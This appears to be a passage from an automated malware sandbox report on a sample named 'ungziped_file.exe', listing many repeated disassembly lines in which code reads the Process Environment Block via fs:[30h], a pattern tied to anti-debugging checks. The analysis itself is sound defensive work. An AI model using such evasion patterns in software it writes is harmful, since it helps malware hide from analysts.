                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0126019F mov eax, dword ptr fs:[00000030h]5_2_0126019F
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0126019F mov eax, dword ptr fs:[00000030h]5_2_0126019F
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0126019F mov eax, dword ptr fs:[00000030h]5_2_0126019F
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012B61E5 mov eax, dword ptr fs:[00000030h]5_2_012B61E5
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012101F8 mov eax, dword ptr fs:[00000030h]5_2_012101F8
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012A61C3 mov eax, dword ptr fs:[00000030h]5_2_012A61C3
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012A61C3 mov eax, dword ptr fs:[00000030h]5_2_012A61C3
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0125E1D0 mov eax, dword ptr fs:[00000030h]5_2_0125E1D0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0125E1D0 mov eax, dword ptr fs:[00000030h]5_2_0125E1D0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0125E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0125E1D0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0125E1D0 mov eax, dword ptr fs:[00000030h]5_2_0125E1D0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0125E1D0 mov eax, dword ptr fs:[00000030h]5_2_0125E1D0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011FE016 mov eax, dword ptr fs:[00000030h]5_2_011FE016
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011FE016 mov eax, dword ptr fs:[00000030h]5_2_011FE016
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011FE016 mov eax, dword ptr fs:[00000030h]5_2_011FE016
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011FE016 mov eax, dword ptr fs:[00000030h]5_2_011FE016
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01276030 mov eax, dword ptr fs:[00000030h]5_2_01276030
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01264000 mov ecx, dword ptr fs:[00000030h]5_2_01264000
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01282000 mov eax, dword ptr fs:[00000030h]5_2_01282000
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01282000 mov eax, dword ptr fs:[00000030h]5_2_01282000
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01282000 mov eax, dword ptr fs:[00000030h]5_2_01282000
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01282000 mov eax, dword ptr fs:[00000030h]5_2_01282000
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01282000 mov eax, dword ptr fs:[00000030h]5_2_01282000
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01282000 mov eax, dword ptr fs:[00000030h]5_2_01282000
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01282000 mov eax, dword ptr fs:[00000030h]5_2_01282000
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01282000 mov eax, dword ptr fs:[00000030h]5_2_01282000
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DA020 mov eax, dword ptr fs:[00000030h]5_2_011DA020
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DC020 mov eax, dword ptr fs:[00000030h]5_2_011DC020
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E2050 mov eax, dword ptr fs:[00000030h]5_2_011E2050
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120C073 mov eax, dword ptr fs:[00000030h]5_2_0120C073
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01266050 mov eax, dword ptr fs:[00000030h]5_2_01266050
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012780A8 mov eax, dword ptr fs:[00000030h]5_2_012780A8
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012A60B8 mov eax, dword ptr fs:[00000030h]5_2_012A60B8
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012A60B8 mov ecx, dword ptr fs:[00000030h]5_2_012A60B8
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E208A mov eax, dword ptr fs:[00000030h]5_2_011E208A
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012660E0 mov eax, dword ptr fs:[00000030h]5_2_012660E0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012220F0 mov ecx, dword ptr fs:[00000030h]5_2_012220F0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DC0F0 mov eax, dword ptr fs:[00000030h]5_2_011DC0F0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E80E9 mov eax, dword ptr fs:[00000030h]5_2_011E80E9
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012620DE mov eax, dword ptr fs:[00000030h]5_2_012620DE
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DA0E3 mov ecx, dword ptr fs:[00000030h]5_2_011DA0E3
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DC310 mov ecx, dword ptr fs:[00000030h]5_2_011DC310
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121A30B mov eax, dword ptr fs:[00000030h]5_2_0121A30B
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121A30B mov eax, dword ptr fs:[00000030h]5_2_0121A30B
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121A30B mov eax, dword ptr fs:[00000030h]5_2_0121A30B
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01200310 mov ecx, dword ptr fs:[00000030h]5_2_01200310
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0128437C mov eax, dword ptr fs:[00000030h]5_2_0128437C
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01262349 mov eax, dword ptr fs:[00000030h]5_2_01262349
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01262349 mov eax, dword ptr fs:[00000030h]5_2_01262349
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01262349 mov eax, dword ptr fs:[00000030h]5_2_01262349
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01262349 mov eax, dword ptr fs:[00000030h]5_2_01262349
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01262349 mov eax, dword ptr fs:[00000030h]5_2_01262349
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01262349 mov eax, dword ptr fs:[00000030h]5_2_01262349
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01262349 mov eax, dword ptr fs:[00000030h]5_2_01262349
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01262349 mov eax, dword ptr fs:[00000030h]5_2_01262349
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01262349 mov eax, dword ptr fs:[00000030h]5_2_01262349
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01262349 mov eax, dword ptr fs:[00000030h]5_2_01262349
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01262349 mov eax, dword ptr fs:[00000030h]5_2_01262349
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01262349 mov eax, dword ptr fs:[00000030h]5_2_01262349
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01262349 mov eax, dword ptr fs:[00000030h]5_2_01262349
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01262349 mov eax, dword ptr fs:[00000030h]5_2_01262349
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01262349 mov eax, dword ptr fs:[00000030h]5_2_01262349
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012AA352 mov eax, dword ptr fs:[00000030h]5_2_012AA352
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01288350 mov ecx, dword ptr fs:[00000030h]5_2_01288350
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0126035C mov eax, dword ptr fs:[00000030h]5_2_0126035C
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0126035C mov eax, dword ptr fs:[00000030h]5_2_0126035C
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0126035C mov eax, dword ptr fs:[00000030h]5_2_0126035C
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0126035C mov ecx, dword ptr fs:[00000030h]5_2_0126035C
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0126035C mov eax, dword ptr fs:[00000030h]5_2_0126035C
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0126035C mov eax, dword ptr fs:[00000030h]5_2_0126035C
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011D8397 mov eax, dword ptr fs:[00000030h]5_2_011D8397
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011D8397 mov eax, dword ptr fs:[00000030h]5_2_011D8397
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011D8397 mov eax, dword ptr fs:[00000030h]5_2_011D8397
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DE388 mov eax, dword ptr fs:[00000030h]5_2_011DE388
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DE388 mov eax, dword ptr fs:[00000030h]5_2_011DE388
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DE388 mov eax, dword ptr fs:[00000030h]5_2_011DE388
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120438F mov eax, dword ptr fs:[00000030h]5_2_0120438F
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120438F mov eax, dword ptr fs:[00000030h]5_2_0120438F
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E83C0 mov eax, dword ptr fs:[00000030h]5_2_011E83C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E83C0 mov eax, dword ptr fs:[00000030h]5_2_011E83C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E83C0 mov eax, dword ptr fs:[00000030h]5_2_011E83C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E83C0 mov eax, dword ptr fs:[00000030h]5_2_011E83C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA3C0 mov eax, dword ptr fs:[00000030h]5_2_011EA3C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA3C0 mov eax, dword ptr fs:[00000030h]5_2_011EA3C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA3C0 mov eax, dword ptr fs:[00000030h]5_2_011EA3C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA3C0 mov eax, dword ptr fs:[00000030h]5_2_011EA3C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA3C0 mov eax, dword ptr fs:[00000030h]5_2_011EA3C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA3C0 mov eax, dword ptr fs:[00000030h]5_2_011EA3C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012163FF mov eax, dword ptr fs:[00000030h]5_2_012163FF
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0129C3CD mov eax, dword ptr fs:[00000030h]5_2_0129C3CD
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012663C0 mov eax, dword ptr fs:[00000030h]5_2_012663C0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011FE3F0 mov eax, dword ptr fs:[00000030h]5_2_011FE3F0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011FE3F0 mov eax, dword ptr fs:[00000030h]5_2_011FE3F0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011FE3F0 mov eax, dword ptr fs:[00000030h]5_2_011FE3F0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F03E9 mov eax, dword ptr fs:[00000030h]5_2_011F03E9
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F03E9 mov eax, dword ptr fs:[00000030h]5_2_011F03E9
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F03E9 mov eax, dword ptr fs:[00000030h]5_2_011F03E9
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F03E9 mov eax, dword ptr fs:[00000030h]5_2_011F03E9
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F03E9 mov eax, dword ptr fs:[00000030h]5_2_011F03E9
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F03E9 mov eax, dword ptr fs:[00000030h]5_2_011F03E9
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F03E9 mov eax, dword ptr fs:[00000030h]5_2_011F03E9
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F03E9 mov eax, dword ptr fs:[00000030h]5_2_011F03E9
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012843D4 mov eax, dword ptr fs:[00000030h]5_2_012843D4
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012843D4 mov eax, dword ptr fs:[00000030h]5_2_012843D4
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011D823B mov eax, dword ptr fs:[00000030h]5_2_011D823B
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E6259 mov eax, dword ptr fs:[00000030h]5_2_011E6259
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DA250 mov eax, dword ptr fs:[00000030h]5_2_011DA250
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01290274 mov eax, dword ptr fs:[00000030h]5_2_01290274
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01268243 mov eax, dword ptr fs:[00000030h]5_2_01268243
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01268243 mov ecx, dword ptr fs:[00000030h]5_2_01268243
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011D826B mov eax, dword ptr fs:[00000030h]5_2_011D826B
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E4260 mov eax, dword ptr fs:[00000030h]5_2_011E4260
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E4260 mov eax, dword ptr fs:[00000030h]5_2_011E4260
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E4260 mov eax, dword ptr fs:[00000030h]5_2_011E4260
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012762A0 mov eax, dword ptr fs:[00000030h]5_2_012762A0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012762A0 mov ecx, dword ptr fs:[00000030h]5_2_012762A0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012762A0 mov eax, dword ptr fs:[00000030h]5_2_012762A0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012762A0 mov eax, dword ptr fs:[00000030h]5_2_012762A0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012762A0 mov eax, dword ptr fs:[00000030h]5_2_012762A0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012762A0 mov eax, dword ptr fs:[00000030h]5_2_012762A0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01260283 mov eax, dword ptr fs:[00000030h]5_2_01260283
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01260283 mov eax, dword ptr fs:[00000030h]5_2_01260283
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01260283 mov eax, dword ptr fs:[00000030h]5_2_01260283
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E284 mov eax, dword ptr fs:[00000030h]5_2_0121E284
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E284 mov eax, dword ptr fs:[00000030h]5_2_0121E284
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F02A0 mov eax, dword ptr fs:[00000030h]5_2_011F02A0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F02A0 mov eax, dword ptr fs:[00000030h]5_2_011F02A0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA2C3 mov eax, dword ptr fs:[00000030h]5_2_011EA2C3
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA2C3 mov eax, dword ptr fs:[00000030h]5_2_011EA2C3
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA2C3 mov eax, dword ptr fs:[00000030h]5_2_011EA2C3
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA2C3 mov eax, dword ptr fs:[00000030h]5_2_011EA2C3
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011EA2C3 mov eax, dword ptr fs:[00000030h]5_2_011EA2C3
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F02E1 mov eax, dword ptr fs:[00000030h]5_2_011F02E1
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F02E1 mov eax, dword ptr fs:[00000030h]5_2_011F02E1
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F02E1 mov eax, dword ptr fs:[00000030h]5_2_011F02E1
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E53E mov eax, dword ptr fs:[00000030h]5_2_0120E53E
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E53E mov eax, dword ptr fs:[00000030h]5_2_0120E53E
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E53E mov eax, dword ptr fs:[00000030h]5_2_0120E53E
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E53E mov eax, dword ptr fs:[00000030h]5_2_0120E53E
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E53E mov eax, dword ptr fs:[00000030h]5_2_0120E53E
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01276500 mov eax, dword ptr fs:[00000030h]5_2_01276500
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0535 mov eax, dword ptr fs:[00000030h]5_2_011F0535
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0535 mov eax, dword ptr fs:[00000030h]5_2_011F0535
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0535 mov eax, dword ptr fs:[00000030h]5_2_011F0535
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0535 mov eax, dword ptr fs:[00000030h]5_2_011F0535
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0535 mov eax, dword ptr fs:[00000030h]5_2_011F0535
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011F0535 mov eax, dword ptr fs:[00000030h]5_2_011F0535
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012B4500 mov eax, dword ptr fs:[00000030h]5_2_012B4500
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012B4500 mov eax, dword ptr fs:[00000030h]5_2_012B4500
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012B4500 mov eax, dword ptr fs:[00000030h]5_2_012B4500
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012B4500 mov eax, dword ptr fs:[00000030h]5_2_012B4500
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012B4500 mov eax, dword ptr fs:[00000030h]5_2_012B4500
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012B4500 mov eax, dword ptr fs:[00000030h]5_2_012B4500
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012B4500 mov eax, dword ptr fs:[00000030h]5_2_012B4500
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121656A mov eax, dword ptr fs:[00000030h]5_2_0121656A
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121656A mov eax, dword ptr fs:[00000030h]5_2_0121656A
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121656A mov eax, dword ptr fs:[00000030h]5_2_0121656A
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E8550 mov eax, dword ptr fs:[00000030h]5_2_011E8550
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E8550 mov eax, dword ptr fs:[00000030h]5_2_011E8550
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012605A7 mov eax, dword ptr fs:[00000030h]5_2_012605A7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012605A7 mov eax, dword ptr fs:[00000030h]5_2_012605A7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012605A7 mov eax, dword ptr fs:[00000030h]5_2_012605A7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012045B1 mov eax, dword ptr fs:[00000030h]5_2_012045B1
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_012045B1 mov eax, dword ptr fs:[00000030h]5_2_012045B1
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E2582 mov eax, dword ptr fs:[00000030h]5_2_011E2582
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E2582 mov ecx, dword ptr fs:[00000030h]5_2_011E2582
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01214588 mov eax, dword ptr fs:[00000030h]5_2_01214588
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E59C mov eax, dword ptr fs:[00000030h]5_2_0121E59C
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E5E7 mov eax, dword ptr fs:[00000030h]5_2_0120E5E7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E5E7 mov eax, dword ptr fs:[00000030h]5_2_0120E5E7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E5E7 mov eax, dword ptr fs:[00000030h]5_2_0120E5E7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E5E7 mov eax, dword ptr fs:[00000030h]5_2_0120E5E7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E5E7 mov eax, dword ptr fs:[00000030h]5_2_0120E5E7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E5E7 mov eax, dword ptr fs:[00000030h]5_2_0120E5E7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E5E7 mov eax, dword ptr fs:[00000030h]5_2_0120E5E7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120E5E7 mov eax, dword ptr fs:[00000030h]5_2_0120E5E7
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121C5ED mov eax, dword ptr fs:[00000030h]5_2_0121C5ED
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121C5ED mov eax, dword ptr fs:[00000030h]5_2_0121C5ED
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E65D0 mov eax, dword ptr fs:[00000030h]5_2_011E65D0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E5CF mov eax, dword ptr fs:[00000030h]5_2_0121E5CF
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E5CF mov eax, dword ptr fs:[00000030h]5_2_0121E5CF
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121A5D0 mov eax, dword ptr fs:[00000030h]5_2_0121A5D0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121A5D0 mov eax, dword ptr fs:[00000030h]5_2_0121A5D0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011E25E0 mov eax, dword ptr fs:[00000030h]5_2_011E25E0
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01266420 mov eax, dword ptr fs:[00000030h]5_2_01266420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01266420 mov eax, dword ptr fs:[00000030h]5_2_01266420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01266420 mov eax, dword ptr fs:[00000030h]5_2_01266420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01266420 mov eax, dword ptr fs:[00000030h]5_2_01266420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01266420 mov eax, dword ptr fs:[00000030h]5_2_01266420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01266420 mov eax, dword ptr fs:[00000030h]5_2_01266420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01266420 mov eax, dword ptr fs:[00000030h]5_2_01266420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121A430 mov eax, dword ptr fs:[00000030h]5_2_0121A430
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01218402 mov eax, dword ptr fs:[00000030h]5_2_01218402
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01218402 mov eax, dword ptr fs:[00000030h]5_2_01218402
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_01218402 mov eax, dword ptr fs:[00000030h]5_2_01218402
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DC427 mov eax, dword ptr fs:[00000030h]5_2_011DC427
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DE420 mov eax, dword ptr fs:[00000030h]5_2_011DE420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DE420 mov eax, dword ptr fs:[00000030h]5_2_011DE420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011DE420 mov eax, dword ptr fs:[00000030h]5_2_011DE420
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_011D645D mov eax, dword ptr fs:[00000030h]5_2_011D645D
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0126C460 mov ecx, dword ptr fs:[00000030h]5_2_0126C460
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120A470 mov eax, dword ptr fs:[00000030h]5_2_0120A470
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120A470 mov eax, dword ptr fs:[00000030h]5_2_0120A470
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0120A470 mov eax, dword ptr fs:[00000030h]5_2_0120A470
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E443 mov eax, dword ptr fs:[00000030h]5_2_0121E443
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E443 mov eax, dword ptr fs:[00000030h]5_2_0121E443
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E443 mov eax, dword ptr fs:[00000030h]5_2_0121E443
                Source: C:\Users\user\Desktop\ungziped_file.exeCode function: 5_2_0121E443 mov eax, dword ptr fs:[00000030h]5_2_0121E443
